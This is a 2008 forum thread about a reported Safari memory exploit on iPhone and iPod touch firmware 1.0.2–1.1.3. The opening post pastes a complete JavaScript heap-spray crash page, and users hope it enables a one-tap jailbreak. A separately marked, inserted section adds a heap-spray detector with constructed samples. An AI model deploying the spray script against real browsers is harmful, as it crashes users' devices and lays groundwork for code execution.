New exploit

Discussion in 'iPod touch Firmware 1.1.3 Discussions' started by jimbeam, Feb 7, 2008.

Thread Status:
Not open for further replies.
  1. jimbeam

    Found this on Engadget

    It's difficult to tell if this is just a little fear-mongering, or cause for real concern, but it looks like there's another iPhone / touch exploit out there lurking on the unseen horizons of those devices' browsers. According to reports, a memory exploit -- similar to the previously-patched TIFF exploit -- has been discovered which affects units with firmware 1.0.2 all the way up to 1.1.3, thus carrying over to new 16GB iPhones and 32GB touches. Apparently, all you have to do is browse over to a site containing the malicious code, and it triggers a memory-exhausting script which causes the phone or iPod to crash. At this point, it doesn't appear to be anything more than a nuisance which can be easily circumvented by disabling JavaScript for Safari, though that hardly qualifies as a fix. To date, Apple hasn't issued a patch for the problem, but keep in mind it's only been a known issue since January 24th.

    If the appsnapp devs can find this then we can have another one tap jailbreak for 1.1.3

    <html><body><script>

    function Demo() {
        var shellcode;
        var addr;
        var fill;

        alert('attempting a crash!');
        shellcode = unescape('%u0c0c');
        fill = unescape('%ucccc');
        addr = 0x02020202;

        // Grow the filler string by repeated doubling.
        var b = fill;
        while (b.length <= 0x40000) b += b;

        // Keep every large string referenced in the array so none can be freed.
        var c = new Array();
        for (var i = 0; i < 36; i++) {
            c[i] =
                b.substring(0, 0x100000 - shellcode.length) +
                shellcode +
                b.substring(0, 0x100000 - shellcode.length) +
                shellcode +
                b.substring(0, 0x100000 - shellcode.length) +
                shellcode +
                b.substring(0, 0x100000 - shellcode.length) +
                shellcode;
        }
    }

    </script>

    <input type='button' onClick='Demo()' value='Go!'>

    </body></html>
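Added example, not part of the original thread or of the quoted article: a heuristic static check that flags script source combining the three traits visible in the page posted above (unescape() on %u literals, a string doubled onto itself, and very large length constants). The function name, the indicator names, the 64 KiB threshold and both sample scripts are assumptions constructed for illustration.

```javascript
// Heuristic static scan for memory-filling ("heap spray" style) scripts.
// Indicator names and the three-of-three rule are assumptions, not a standard.
function scanForHeapSpray(source) {
  const findings = [];

  // 1. unescape() applied to %uXXXX literals: builds raw 16-bit filler units.
  const unescapes =
    source.match(/unescape\(\s*['"](?:%u[0-9a-fA-F]{4})+['"]\s*\)/g) || [];
  if (unescapes.length > 0) {
    findings.push({ indicator: 'unescape-%u-literal', count: unescapes.length });
  }

  // 2. A variable concatenated onto itself (b += b, b = b + b): exponential growth.
  const doubling =
    source.match(/\b([A-Za-z_$][\w$]*)\s*(?:\+=\s*\1\b|=\s*\1\s*\+\s*\1\b)/g) || [];
  if (doubling.length > 0) {
    findings.push({ indicator: 'self-doubling-string', count: doubling.length });
  }

  // 3. Numeric literals of 64 KiB or more, which rarely appear as string lengths.
  const numbers = source.match(/\b(?:0x[0-9a-fA-F]+|\d+)\b/g) || [];
  const large = numbers.filter((n) => Number(n) >= 0x10000);
  if (large.length > 0) {
    findings.push({ indicator: 'large-size-constant', count: large.length });
  }

  // Each trait alone is common in benign code; all three together are not.
  return { suspicious: findings.length === 3, findings };
}

// Constructed sample with the same shape as the script in the post above.
const SPRAY_SAMPLE = `
  var fill = unescape('%ucccc');
  var b = fill;
  while (b.length <= 0x40000) b += b;
  var c = [];
  for (var i = 0; i < 36; i++) { c[i] = b.substring(0, 0x100000 - 1) + fill; }
`;

// Constructed benign sample: one unescape() call, ordinary loop, small numbers.
const BENIGN_SAMPLE = `
  var total = 0;
  for (var i = 0; i < 10; i++) { total += i; }
  var name = unescape('%u00e9');
`;

console.log(scanForHeapSpray(SPRAY_SAMPLE), scanForHeapSpray(BENIGN_SAMPLE));
```

A check like this is only a triage signal for a proxy or crawler; obfuscated scripts will not match it, so it complements rather than replaces the mitigation quoted in the article (disabling JavaScript until a patch is available).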
  2. simonrichards150

  3. jimbeam

  4. Wolf

    Does this mean we can have another jailbreak like 1.1.1? (just go to the webpage and presto!)
  5. jimbeam

    maybe............................10 characters
  6. Steaps

    Sweeet. BLAH BLAH
  7. brenner14

    Wow, let's hope this plays out!
  8. Teslanaut

    But the article said it's only for 16 GB iPhones and 32 GB iPod Touches...

    Is there some different hardware or code in these new buffed devices?

    If so, I'm so exchanging

    Still got some time on my purchase, hasn't been two weeks yet
  9. bulbous nub

    It says it affects all firmwares from 1.0.2 to 1.1.3, which carries over to the new 16/32s. Nothing is different other than the amount of storage backing it.
  10. Teslanaut

    Ohh, good, thanks for telling me that, now I can save over 200+ dollars! lol